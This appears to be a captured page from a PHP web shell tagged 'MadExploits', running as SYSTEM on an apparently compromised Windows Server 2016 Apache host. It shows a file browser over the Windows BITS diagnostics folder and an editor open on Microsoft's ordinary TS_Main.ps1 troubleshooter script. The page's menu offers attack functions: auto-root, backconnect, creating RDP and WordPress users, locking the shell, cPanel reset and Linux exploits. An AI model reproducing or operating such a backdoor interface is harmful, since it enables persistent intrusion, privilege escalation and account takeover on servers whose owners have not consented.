Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
Windows /
diagnostics /
system /
BITS /
[ HOME SHELL ]
Name
Size
Permission
Action
en-US
[ DIR ]
drwxrwxrwx
CL_Registry.ps1
19.58
KB
-rw-rw-rw-
DiagPackage.diagpkg
6.98
KB
-rw-rw-rw-
DiagPackage.dll
77
KB
-rw-rw-rw-
RC_BITSACL.ps1
1.03
KB
-rw-rw-rw-
RC_BITSDLL.ps1
2.17
KB
-rw-rw-rw-
RC_BITSRegKeys.ps1
5.2
KB
-rw-rw-rw-
RS_BITSACL.ps1
858
B
-rw-rw-rw-
RS_BITSDLL.ps1
779
B
-rw-rw-rw-
RS_BITSRegKeys.ps1
5.19
KB
-rw-rw-rw-
TS_Main.ps1
1.81
KB
-rw-rw-rw-
cl_Service.ps1
10.18
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TS_Main.ps1
# Copyright © 2015, Microsoft Corporation. All rights reserved. # :: ======================================================= :: #==================================================================================== # Initialize #==================================================================================== Import-LocalizedData -BindingVariable Strings_Main -FileName CL_LocalizationData #==================================================================================== # Load Utilities #==================================================================================== . ./CL_Service.ps1 #==================================================================================== # Main #==================================================================================== Write-DiagProgress -Activity $Strings_Main.ID_PROG_MAIN_Initializing # Checking for root causes . .\RC_BITSRegKeys.ps1 | Out-Null . .\RC_BITSDLL.ps1 | Out-Null . .\RC_BITSACL.ps1 | Out-Null Write-DiagProgress -Activity (($Strings_Main.ID_STATUS_START_SERVICE).Replace('%ServiceName%','Bits')) # Clear bits queue Set-Service bits -StartupType Automatic -ErrorAction SilentlyContinue & "$env:windir\system32\bitsadmin.exe" /reset /allusers $output = net start bits 2>&1 if ((IsServiceInstalled "bits") -eq $true) { Get-Service bits -DependentServices -ErrorAction SilentlyContinue | Start-Service -ErrorAction SilentlyContinue } if($output) { $sb = New-Object System.Text.StringBuilder $sb.Append(($Strings_Main.ID_BITS_ERROR_MSG_SERVICE)) $sb.Append("`n") foreach($o in $output) { if($o) { $sb.append($o.tostring().Trim() + ' ') } } ($sb.ToString()) | ConvertTo-Xml | Update-DiagReport -ID 'TS_Main' -Name 'Service Status' -Verbosity Informational; } cmd /c 'sc config bits start = auto'
Close